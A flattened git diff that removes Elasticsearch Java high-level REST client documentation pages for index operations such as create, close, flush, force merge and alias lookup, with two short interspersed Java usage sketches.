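To show the analyze calls end to end, here is a short editorial sketch using a built-in analyzer. It assumes an existing `RestHighLevelClient` named `client`; the sample strings are arbitrary and imports are omitted.

["source","java"]
--------------------------------------------------
// Analyze two strings with the built-in "english" analyzer
AnalyzeRequest request = AnalyzeRequest.withGlobalAnalyzer("english",
    "Some text to analyze", "Some more text to analyze");

AnalyzeResponse response = client.indices().analyze(request, RequestOptions.DEFAULT);
for (AnalyzeResponse.AnalyzeToken token : response.getTokens()) {
    String term = token.getTerm();      // the emitted token
    int position = token.getPosition(); // its position in the token stream
}
--------------------------------------------------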
\ No newline at end of file diff --git a/docs/java-rest/high-level/indices/clear_cache.asciidoc b/docs/java-rest/high-level/indices/clear_cache.asciidoc deleted file mode 100644 index bbd2389ee6e..00000000000 --- a/docs/java-rest/high-level/indices/clear_cache.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ --- -:api: clear-cache -:request: ClearIndicesCacheRequest -:response: ClearIndicesCacheResponse --- - -[id="{upid}-{api}"] -=== Clear Cache API - -[id="{upid}-{api}-request"] -==== Clear Cache Request - -A +{request}+ can be applied to one or more indices, or even on -`_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Clears the cache of one index -<2> Clears the cache of multiple indices -<3> Clears the cache of all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Set the `query` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-fielddata] --------------------------------------------------- -<1> Set the `fielddata` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-request] --------------------------------------------------- -<1> Set the `request` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-fields] --------------------------------------------------- -<1> Set the `fields` parameter - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Cache Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the clear cache request -<2> Number of shards where the clear cache has succeeded -<3> Number of shards where the clear cache has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be cleared were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/clone_index.asciidoc b/docs/java-rest/high-level/indices/clone_index.asciidoc deleted file mode 100644 index 7448b8a402b..00000000000 --- 
a/docs/java-rest/high-level/indices/clone_index.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ --- -:api: clone-index -:request: ResizeRequest -:response: ResizeResponse --- - -[id="{upid}-{api}"] -=== Clone Index API - -[id="{upid}-{api}-request"] -==== Resize Request - -The Clone Index API requires a +{request}+ instance. -A +{request}+ requires two string arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The target index (first argument) to clone the source index (second argument) into -<2> The resize type needs to be set to `CLONE` - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the clone index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the clone index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> The settings to apply to the target index, which optionally include the -number of shards to create for it - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The aliases to associate the target index with - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clone Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out - - diff --git a/docs/java-rest/high-level/indices/close_index.asciidoc b/docs/java-rest/high-level/indices/close_index.asciidoc deleted file mode 100644 index 6d6fb917c79..00000000000 --- a/docs/java-rest/high-level/indices/close_index.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: close-index -:request: CloseIndexRequest -:response: CloseIndexResponse --- - 
-[id="{upid}-{api}"] -=== Close Index API - -[id="{upid}-{api}-request"] -==== Close Index Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to close - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is closed -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Close Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/create_index.asciidoc b/docs/java-rest/high-level/indices/create_index.asciidoc deleted file mode 100644 index 004279ba2a8..00000000000 --- a/docs/java-rest/high-level/indices/create_index.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ --- -:api: create-index -:request: CreateIndexRequest -:response: CreateIndexResponse --- - -[id="{upid}-{api}"] -=== Create Index API - -[id="{upid}-{api}-request"] -==== Create Index Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to create - -==== Index settings -Each index created can have specific settings associated with it. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Settings for this index - -[[java-rest-high-create-index-request-mappings]] -==== Index mappings -An index may be created with mappings for its document types - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings] --------------------------------------------------- -<1> The type to define -<2> The mapping for this type, provided as a JSON string - -The mapping source can be provided in different ways in addition to the -`String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-mappings-map] --------------------------------------------------- -<1> Mapping source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-mappings-xcontent] --------------------------------------------------- -<1> Mapping source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -==== Index aliases -Aliases can be set at index creation time - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The alias to define - -==== Providing the whole source - -The whole source including all of its sections (mappings, settings and aliases) -can also be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-whole-source] --------------------------------------------------- -<1> The source provided as a JSON string. It can also be provided as a `Map` -or an `XContentBuilder`. 
- -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index creation as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the create index API returns a -response, as an `int` -<2> The number of active shard copies to wait for before the create index API returns a -response, as an `ActiveShardCount` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Create Index Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/delete_alias.asciidoc b/docs/java-rest/high-level/indices/delete_alias.asciidoc deleted file mode 100644 index ec451c5bc5c..00000000000 --- a/docs/java-rest/high-level/indices/delete_alias.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ --- -:api: delete-alias -:request: DeleteAliasRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Alias API - -[id="{upid}-{api}-request"] -==== Delete Alias Request - -An +{request}+ requires an `index` and an `alias` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -[id="{upid}-{api}-response"] -==== Delete Alias Response - -The returned +{response}+ indicates if the request to delete the alias -was received. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to delete the alias was -acknowledged. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/delete_index.asciidoc b/docs/java-rest/high-level/indices/delete_index.asciidoc deleted file mode 100644 index c96885790b3..00000000000 --- a/docs/java-rest/high-level/indices/delete_index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ --- -:api: delete-index -:request: DeleteIndexRequest -:response: DeleteIndexResponse --- - -[id="{upid}-{api}"] -=== Delete Index API - -[id="{upid}-{api}-request"] -==== Delete Index Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index deletion as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index deletion as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete Index Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request - -If the index was not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the index to be deleted was not found diff --git a/docs/java-rest/high-level/indices/delete_index_template.asciidoc b/docs/java-rest/high-level/indices/delete_index_template.asciidoc deleted file mode 100644 index 0f28e0d80eb..00000000000 --- a/docs/java-rest/high-level/indices/delete_index_template.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: delete-index-template-v2 -:request: DeleteIndexTemplateV2Request -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Composable Index Template API - 
-[id="{upid}-{api}-request"] -==== Request - -The Delete Composable Index Template API allows you to delete an index template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of an index template to delete. - -=== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete template request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete template request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/indices/delete_template.asciidoc b/docs/java-rest/high-level/indices/delete_template.asciidoc deleted file mode 100644 index 4ca88f1bfc1..00000000000 --- a/docs/java-rest/high-level/indices/delete_template.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: delete-template -:request: DeleteIndexTemplateRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Template API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Template API allows you to delete an index template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of an index template to delete. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete template request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete template request was acknowledged. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/exists_alias.asciidoc b/docs/java-rest/high-level/indices/exists_alias.asciidoc deleted file mode 100644 index baaf7585683..00000000000 --- a/docs/java-rest/high-level/indices/exists_alias.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: exists-alias -:request: GetAliasesRequest -:response: Boolean --- - -[id="{upid}-{api}"] -=== Exists Alias API - -[id="{upid}-{api}-request"] -==== Exists Alias Request - -The Exists Alias API uses +{request}+ as its request object. -One or more aliases can be optionally provided either at construction -time or later on through the relevant setter method. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-alias] --------------------------------------------------- -<1> One or more aliases to look for - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices] --------------------------------------------------- -<1> The index or indices that the alias is associated with - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> The `local` flag (defaults to `false`) controls whether the aliases need -to be looked up in the local cluster state or in the cluster state held by -the elected master node - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Exists Alias Response - -The Exists Alias API returns a +{response}+ that indicates whether the provided -alias (or aliases) was found or not. diff --git a/docs/java-rest/high-level/indices/flush.asciidoc b/docs/java-rest/high-level/indices/flush.asciidoc deleted file mode 100644 index 8bcb203186f..00000000000 --- a/docs/java-rest/high-level/indices/flush.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: flush -:request: FlushRequest -:response: FlushResponse --- - -[id="{upid}-{api}"] -=== Flush API - -[id="{upid}-{api}-request"] -==== Flush Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Flush one index -<2> Flush multiple indices -<3> Flush all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait] --------------------------------------------------- -<1> Set the `wait_if_ongoing` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-force] --------------------------------------------------- -<1> Set the `force` flag to `true` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Flush Response - -The returned +{response}+ 
allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the flush request -<2> Number of shards where the flush has succeeded -<3> Number of shards where the flush has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be flushed were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/flush_synced.asciidoc b/docs/java-rest/high-level/indices/flush_synced.asciidoc deleted file mode 100644 index e5dfa59153b..00000000000 --- a/docs/java-rest/high-level/indices/flush_synced.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ --- -:api: flush-synced -:request: SyncedFlushRequest -:response: SyncedFlushResponse --- - -[id="{upid}-{api}"] -=== Flush Synced API - -[id="{upid}-{api}-request"] -==== Flush Synced Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Flush synced one index -<2> Flush synced multiple indices -<3> Flush synced all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Flush Synced Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the flush request -<2> Number of shards where the flush has succeeded -<3> Number of shards where the flush has failed -<4> Name of the index whose results we are about to calculate. -<5> Total number of shards for index mentioned in 4. -<6> Successful shards for index mentioned in 4. -<7> Failed shards for index mentioned in 4. -<8> One of the failed shard ids of the failed index mentioned in 4. -<9> Reason for failure of copies of the shard mentioned in 8. -<10> JSON represented by a Map. Contains shard related information like id, state, version etc. -for the failed shard copies. If the entire shard failed then this returns an empty map. 
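Stepping back to the plain Flush API described just before this section, here is an editorial sketch of a flush call and the shard summary it returns; `my_index` is a hypothetical index name and `client` an existing `RestHighLevelClient`, with imports omitted.

["source","java"]
--------------------------------------------------
// Flush a single index and inspect the shard-level summary
FlushRequest request = new FlushRequest("my_index");

FlushResponse response = client.indices().flush(request, RequestOptions.DEFAULT);
int totalShards = response.getTotalShards();
int successfulShards = response.getSuccessfulShards();
int failedShards = response.getFailedShards();
--------------------------------------------------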
- -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be flushed were not found diff --git a/docs/java-rest/high-level/indices/force_merge.asciidoc b/docs/java-rest/high-level/indices/force_merge.asciidoc deleted file mode 100644 index 8126ad597f9..00000000000 --- a/docs/java-rest/high-level/indices/force_merge.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ --- -:api: force-merge -:request: ForceMergeRequest -:response: ForceMergeResponse --- - -[id="{upid}-{api}"] -=== Force Merge API - -[id="{upid}-{api}-request"] -==== Force merge Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Force merge one index -<2> Force merge multiple indices -<3> Force merge all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-segments-num] --------------------------------------------------- -<1> Set `max_num_segments` to control the number of segments to merge down to. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-only-expunge-deletes] --------------------------------------------------- -<1> Set the `only_expunge_deletes` flag to `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-flush] --------------------------------------------------- -<1> Set the `flush` flag to `true` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Force Merge Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the force merge request -<2> Number of shards where the force merge has succeeded -<3> Number of shards where the force merge has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be force merged were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/freeze_index.asciidoc b/docs/java-rest/high-level/indices/freeze_index.asciidoc deleted file mode 100644 index 2a26fe8bcd4..00000000000 --- a/docs/java-rest/high-level/indices/freeze_index.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ --- -:api: freeze-index -:request: FreezeIndexRequest -:response: FreezeIndexResponse --- - -[id="{upid}-{api}"] -=== Freeze Index API - -[id="{upid}-{api}-request"] -==== Freeze Index Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to freeze - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is frozen -as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the freeze index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] 
--------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Freeze Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/get_alias.asciidoc b/docs/java-rest/high-level/indices/get_alias.asciidoc deleted file mode 100644 index c51f9fe5b95..00000000000 --- a/docs/java-rest/high-level/indices/get_alias.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ --- -:api: get-alias -:request: GetAliasesRequest -:response: GetAliasesResponse --- - -[id="{upid}-{api}"] -=== Get Alias API - -[id="{upid}-{api}-request"] -==== Get Alias Request - -The Get Alias API uses +{request}+ as its request object. -One or more aliases can be optionally provided either at construction -time or later on through the relevant setter method. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-alias] --------------------------------------------------- -<1> One or more aliases to retrieve - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices] --------------------------------------------------- -<1> The index or indices that the alias is associated with - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded when looking for aliases that belong to -specified indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> The `local` flag (defaults to `false`) controls whether the aliases need -to be looked up in the local cluster state or in the cluster state held by -the elected master node - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Alias Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Retrieves a map of indices and their aliases - -+{response}+ class contains information about errors if they occurred. 
-Depending on the case, this information is available in either the `error` or the `exception` field. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-error] --------------------------------------------------- -<1> The client sets the status to `NOT_FOUND` if at least one of the specified -indices or aliases is not found. Otherwise the status is `OK`. - -<2> If at least one of the specified indices does not exist, the client sets -an `ElasticsearchException` and returns an empty result. - -<3> If at least one of the specified aliases does not exist, the client puts -an error description in the `error` field and returns a partial result if any -of the other patterns match. - -If the indices or aliases were specified as regular expressions -and nothing was found, the client returns an `OK` status and no errors.
diff --git a/docs/java-rest/high-level/indices/get_field_mappings.asciidoc b/docs/java-rest/high-level/indices/get_field_mappings.asciidoc deleted file mode 100644 index 4d8117c15fe..00000000000 --- a/docs/java-rest/high-level/indices/get_field_mappings.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ --- -:api: get-field-mappings -:request: GetFieldMappingsRequest -:response: GetFieldMappingsResponse --- - -[id="{upid}-{api}"] -=== Get Field Mappings API - -[id="{upid}-{api}-request"] -==== Get Field Mappings Request - -A +{request}+ can have an optional list of indices, an optional list of types, and the list of fields: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> An empty request -<2> Setting the indices to fetch mapping for -<3> The fields to be returned - -==== Optional arguments -The following arguments can also optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> deprecated:[7.8.0, This parameter is a no-op and field mappings are always retrieved locally] -The `local` flag (defaults to `false`) controls whether the field mappings are -looked up in the local cluster state or in the cluster state held by -the elected master node - -include::../execution.asciidoc[] - 